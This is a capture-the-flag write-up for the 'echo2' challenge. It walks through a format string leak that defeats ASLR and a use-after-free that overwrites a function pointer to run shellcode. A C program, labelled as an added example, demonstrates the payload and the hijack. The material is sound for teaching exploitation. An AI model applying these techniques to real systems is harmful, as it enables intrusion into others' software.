Writeup: echo2

theFaunia in the wild 2019. 3. 26. 04:39

First we notice a format string vulnerability that lets us leak stack addresses, which is what we need to bypass ASLR.



After a few attempts we find that %10$p leaks a stack address. The name buffer, which we filled with the test value "AAAA", sits 0x20 bytes below it, so subtracting 0x20 from the leaked value gives us the address of name.



The next step is to write the exploit that performs the leak, using the pwntools library.



With the leak in hand, we look at option 4: it calls free() on the heap object that holds the name. free() receives the pointer stored in the variable "o", which points to the heap chunk whose first bytes are the content of name.



We check in memory:



After the free we answer "n" so the program does not exit. That leaves the first chunk freed but still referenced by the program: a Use After Free. The point of freeing it is that option 3 lets us write into that first chunk again, and after 24 bytes of padding our write overwrites the greetings function pointer with the leaked stack address, where name (and therefore our shellcode) lives. The vulnerability is that the program still calls greetings through the freed object, so a write into the reused chunk, 24 bytes of padding plus the address we want, hijacks the execution flow.
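The two steps described above (computing the name address from the %10$p leak, and reusing the freed chunk to overwrite the greetings pointer), as an added example that is not part of the original writeup nor the echo2 binary: a self-contained C model of the heap object and of the exploit write. The struct and field names, the stand-in function that plays the role of the shellcode in name, and the leak string are assumptions made for this demo; the layout (24 bytes of name followed by the function pointer) is what the 24-byte padding in the writeup implies, and the host is assumed to be little-endian x86-64.

```c
/* Added example: model of the echo2 heap object and of the UAF hijack.
 * Not the writeup's exploit and not the echo2 binary; names are assumed. */
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Assumed layout: 24 bytes of name, then the greetings function pointer. */
struct echo_obj {
    char name[24];
    void (*greetings)(void);
};

#define PAYLOAD_LEN (24 + sizeof(uintptr_t))

/* Step 1: turn the text printed by %10$p into the address of name[] on the
 * stack (the writeup found name 0x20 bytes below the leaked value). Returns 0
 * when the leak text is not a hex number. */
uintptr_t name_addr_from_leak(const char *leak_text) {
    uintptr_t leak = (uintptr_t)strtoull(leak_text, NULL, 16);
    return leak ? leak - 0x20 : 0;
}

/* Step 2: 24 bytes of padding followed by the target address, little-endian
 * (assumes x86-64), exactly what option 3 writes into the reused chunk. */
size_t build_uaf_payload(uintptr_t target, unsigned char *out) {
    memset(out, 'A', 24);
    memcpy(out + 24, &target, sizeof target);
    return PAYLOAD_LEN;
}

static int g_hijacked;
static void original_greetings(void) { g_hijacked = 0; }
/* Stands in for the shellcode stored in name[] on the stack. */
static void fake_shellcode(void) { g_hijacked = 1; }

/* Returns 1 if the hijack works, 2 if malloc did not hand back the freed
 * chunk (an allocator without same-size reuse), 0 on allocation failure. */
int uaf_demo(void) {
    g_hijacked = 0;
    struct echo_obj *o = malloc(sizeof *o);
    if (!o) return 0;
    memset(o, 0, sizeof *o);
    strcpy(o->name, "AAAA");
    o->greetings = original_greetings;

    free(o);               /* option 4, then "n": o is now dangling */

    /* option 3: a same-size allocation filled with user data. glibc returns
     * the chunk just freed, so the write lands on the object o still uses. */
    unsigned char *buf = malloc(sizeof *o);
    if (!buf) return 0;
    if ((uintptr_t)buf != (uintptr_t)o) { free(buf); return 2; }

    unsigned char payload[PAYLOAD_LEN];
    build_uaf_payload((uintptr_t)&fake_shellcode, payload);
    memcpy(buf, payload, PAYLOAD_LEN);  /* padding + pointer overwrite */

    o->greetings();        /* the program still calls greetings through o */
    free(buf);
    return g_hijacked;
}

int main(void) {
    printf("name is at 0x%lx\n",
           (unsigned long)name_addr_from_leak("0x7ffe12345678"));
    printf("uaf_demo -> %d\n", uaf_demo());
    return 0;
}
```

uaf_demo reports 2 instead of a hijack when the allocator does not return the freed chunk for the next same-size request; on glibc (tcache and fastbins) it does, and that reuse is exactly what the real exploit depends on when option 3 writes into the first chunk.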



The finished exploit looks like this, and it gives us a shell! :)


